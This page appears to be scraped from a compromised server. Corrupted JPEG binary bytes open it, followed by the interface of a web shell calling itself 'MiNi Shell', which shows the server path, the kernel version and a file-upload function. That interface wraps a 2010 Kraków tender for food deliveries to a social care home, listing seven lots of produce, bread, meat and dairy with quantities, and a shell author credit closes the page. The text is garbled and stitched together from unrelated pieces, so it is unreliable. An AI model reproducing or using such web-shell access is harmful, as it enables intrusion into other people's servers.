JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/12924-N-2010.html

<p class="kh_header"><b>Kraków: Dostawa artykułów żywnościowych</b><br>
<b>Numer ogłoszenia: 12924 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Praska 25, 30-329 Kraków, woj. małopolskie, tel. 012 2660364, faks 012 2660364 w. 27.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Dom pomocy społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych.

Wspólny Słownik Zamówień (CPV): 03221000-6, 03222300-6, 15811000-6, 15331170-9, 03142500-3, 15800000-6,15100000-9, 15500000-3.
Zamawiający dopuszcza składanie ofert częściowych:
 
Część I będzie obejmować świeże warzywa i owoce.
Część II będzie obejmować wyroby piekarskie.
Część III będzie obejmować mrożone artykuły spożywcze.
Część IV będzie obejmować jaja kurze świeże.
Część V będzie obejmować artykuły spożywcze sypkie, koncentraty, przyprawy i desery.
Część VI będzie obejmować  mięso świeże, wędliny i drób.
Część VII będzie obejmować mleko i produkty mleczarskie.

Zamawiający nie dopuszcza składania ofert wariantowych.
Zamawiający przewiduje zamówienia uzupełniające..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6, 15.81.10.00-6, 15.33.11.70-9, 03.14.25.00-3, 15.80.00.00-6, 15.10.00.00-9, 15.50.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu może wziąć udział wykonawca, który:
1)spełnia warunki, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.), 
2)nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy.

Ocena spełnienia warunków, o których mowa, będzie dokonana na podstawie złożonych przez Wykonawcę oświadczeń - z oświadczeń jednoznacznie powinno wynikać, że Wykonawca spełnia warunki, o których mowa w art. 22 ust. 1 ustawy, oraz nie podlega wykluczeniu z postępowania na podstawie art. 24 ust.1 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)oświadczenie o spełnieniu warunków udziału w postępowaniu (Załącznik 2)
2)oświadczenie Wykonawcy o braku podstaw do wykluczenia (Załącznik 3), 

UWAGA 1. 	Oświadczenia, o których mowa w pkt 1 i 2, powinny być podpisane przez osoby podpisujące ofertę.
UWAGA 2. 	Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, oświadczenie, o którym mowa w pkt 2, w zakresie niepodlegania wykluczeniu z postępowania, powinien być złożony przez każdego z Wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.krakow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej przy ul. Praskiej 25   30-329 Kraków (wejście i wjazd od ul. Czarodziejskiej).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2010 godzina 10:00, miejsce: Oferty należy składać w sekretariacie Domu Pomocy Społecznej przy ul. Praskiej 25   30-329 Kraków (wejście i wjazd od ul. Czarodziejskiej), od poniedziałku do piątku w godz. od 8.00 do 14.00.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 05.03.2010.</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> świeże warzywa i owoce.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Nazwa
Ilość
1
2
3
2
Buraki
1 250 kg
3
Botwina
   300 szt
4
Brzoskwinie
   120 kg
5
Cebula
   950 kg
6
Czosnek 
   230 szt
7
Cytryny
     12 kg
8
Fasola Jaś
   120 kg
9
Fasola szparagowa/żółta/
     95 kg
10
Groch Viktoria
   140 kg
11
Gruszki
     60 kg
12
Jabłka
 1850 kg
13
Kapusta kiszona
  410 kg
14
Kapusta czerwona
  120 kg
15
Kapusta biała
  585 kg
16
Kalafior
  230 szt
17
Koper świeży
  820 szt
18
Kapusta włoska
  350 szt
19
Kalarepa
    60 szt
20
Kapusta pekińska
  175 szt
21
Marchew
 1700 kg
22
Ogórek kiszony
   760 kg
23
Ogórek świeży
   290 kg
24
Pory
  1050 szt
25
Pomarańcze
   175 kg
26
Pieczarki
   210 kg
27
Pomidory
   760 kg
28
Pietruszka zielona
   880 szt
29
Rabarbar
   120 kg
30
Rzodkiewka
   350 szt
31
Seler
   700 kg
32
Szczypior
    290 szt
33
Sałata zielona
    530 szt
34
Śliwy
       95 kg
35
Truskawki
     120 kg
36
Ziemniaki
14600 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Nazwa 
Ilość
   1
2
3
1
Chleb  krakowski
(niekrojony 0,60 kg)
10 800 szt
2
Bułka kajzerka
(0,05 kg)
 4 4500 szt
3
Chleb graham
(niekrojony 0,45 kg)
1 990 szt
4
Weka (0,40kg)
70 szt
5
Bułka tarta
120 kg
6
Drożdżówki
2 350 szt
7
Babka piaskowa
                         240 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> mrożone artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Nazwa 
Ilość
1
2
3
1
Brokuł
120 kg
2
Bruksela
70 kg
3
Fasolka szparagowa zielona
60 kg
4
Kalafior
95 kg
5
Mieszanka.kompotowa 4 skł.
590 kg
6
Mieszanka warzywna 3 skł.
95 kg
7
Szpinak
295 kg
8
Truskawka
120 kg
9
Filet rybny Panga biała
295 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> jaja kurze świeże o gramaturze 50 g.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Nazwa artykułu
Ilość w szt
1
2
3
2
 Jaja 50g
26700.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> artykuły spożywcze sypkie, koncentraty, przyprawy i desery.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Nazwa 
 Ilość
   1
2
3
1
Aromaty do ciast
50 szt
2
Budyń (różne smaki) 1 kg
60 kg
3
Budyń bezcukrowy (różne smaki) 40 g
350 szt
4
Cukier kryształ 1 kg
2500 kg
5
Cukier puder 0,5 kg
80 kg
6
Chrzan tarty Polonaise  180 g
470 szt
7
Cukier waniliowy 
 20 g
120 szt
8
Cynamon 20 g
60 szt
9
Dżem wysokosłodzony (różne smaki) 260 g
290 szt
10
Dżem bezcukrowy (różne smaki) 200 g
240 szt
11
Groszek konserwowy 400 g
240 szt
12
Herbata granulowana
indyjska 100 g
80 kg
13
Kasza manna 1 kg
290 kg
14
Kasza jęczmienna 
1 kg  
  60 kg
15
Kwasek cytrynowy 20 g
240 szt
16
Kminek 20 g
480 szt
17
Szproty w pomidorach 170 g
530 szt
18
Szproty w oleju 170 g
530 szt
19
Koncentrat pomidorowy 890 g
290 szt
20
Kisiel bezcukrowy (różne smaki) 40 g
480 szt
21
Kisiel bezcukrowy (różne smaki) 1 kg
50 kg
22
Pasztet drobiowy 
110 g
960 szt
23
Kakao 200 g
120 szt
24
Kawa Inka 150 g
585 szt
25
Kasza gryczana 1 kg
60 kg
26
Ketchup łagodny 
0,5 l
140 szt
27
Liść laurowy 5 g
80 szt
28
Mąka pszenna poznańska 1 kg
1300 kg
29
Majeranek 20 g
120 szt
30
Musztarda 0,9 l
120 szt
31
Mąka ziemniaczana 
1 kg
80 kg
32
Makaron (różne kształty) 1 kg
880 kg
33
Majonez 0,9 l
120 szt
34
Ogórek konserwowy 0,9 l
240 szt
35
Olej uniwersalny 
0,9 l
120 szt
36
Ocet 0,5 l   10%
80 szt
37
Przyprawa w płynie Winiary 
0,9 l
240 szt
38
Papryka mielona słodka 20 g
480 szt
39
Pieprz naturalny ziarno luz
7 kg
40
Powidła śliwkowe 0,9 l
70 szt
41
Marmolada wieloowocowa 0,9 l
70 szt
42
Płatki owsiane górskie 0,5 kg
180 kg
43
Papryka konserwowa 0,9 l
50 szt
44
Przyprawa do kurczaka  20 g
90 szt
45
Ryż 1 kg
585 kg
46
Sól jodowana 1 kg
530 kg
47
Suchary delikatesowe bezcukrowe 285 g
95 szt
48
Syrop Paola (różne smaki)  
335 ml
140 szt
49
Szczaw konserwowy 320 g
60 szt
50
Przyprawa Kucharek 1 kg
50 kg
51
Ziele angielskie 20 g
95 szt
52
Wafle bezcukrowe 
80 g
470 szt
53
Listki waflowe 43 g
470 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> mięso świeże, wędliny i drób.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.

     Nazwa
     Ilość
     w  kg 


Mięso świeże :


1
Szynka wieprzowa bez kości
180


2
Gulasz wieprzowy I
360

3

Gulasz wieprzowy II
360


4

Schab wieprzowy z kością 

180


5
Karczek wieprzowy  bez kości
240


6
Wątroba wieprzowa 
70


7
Ozorki wieprzowe
60


8
Serca wieprzowe
60


9
Głowy  wieprzowe
120


10
Nogi wieprzowe
120


11
Smalec
585


12
Słonina
240


13

Kiszka
240



Wędliny świeże ( nieprzesolone ) :


14

Kiełbasa zwyczajna
410


15
Kiełbasa parówkowa
240


16
Kiełbasa krakowska parzona
60


17
Parówki  wieprzowe
240


18
Pasztetowa lux
120


19
Kiełbasa żywiecka
120


20
Lunchmeat
60


21
Kiełbasa zielonogórska
70


22
Kiełbasa golonkowa
70


23
 Kiełbasa biała surowa
170


24
Mortadela bez dodatków 
300


25
Kiełbasa wiejska
35


26
Kiełbasa szynkowa
95


27
Kiełbasa  łopatkowa
60


28
Szynka łopatkowa
60


29
Szynka golonkowa
35


30
Szynkowa wieprzowa gotowana
60


31
Szynka wieprzowa mielona
95


32
Szynka wieprzowa konserwowa
60


33
Pasztet wieprzowy pieczony
35


34
Baleron
95


35
Salceson drobiowy
120


36

Pasztet drobiowy pieczony
60


37


Polędwica z indyka
60


38

Kiełbasa krakowska drobiowa
95


39
Filet z indyka pieczony


60



Mięso drobiowe  świeże


40
Filet z indyka
60


41
Filet z kurczaka
600


42
Udka z kurczaka
760


43
Dramstiki 
120


44
Wątróbka drobiowa
95


45
Żołądki drobiowe
120.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> mleko i produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Opis przedmiotu zamówienia
      Ilość
1
Mleko krowie 2% tł. op.15 l
 17 550 l
2
Kefir  opak. 400 ml
     500 szt
3
Jogurt naturalny  opak.150 g
    585 szt
4
Masło ekstra 82% tł. 200 g
  5 300 szt
5
Ser żółty zamojski/edam-ski
       95 kg
6
Serki topione krem. opak. 100 g
     770 szt
7
Ser biały półtłusty
  1 650 kg
8
Serek homogenizowany naturalny opak. 150 g
  1 760 szt
9
Serek homogenizowany  owocowy    opak. 150 g
  1 760 szt
10
Jogurt bezcukrowy owocowy 250g
700 szt
11
Serek śniadaniowy 80 g
     1 050 szt
12
Śmietana 18% opak.400 ml
  2 100 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com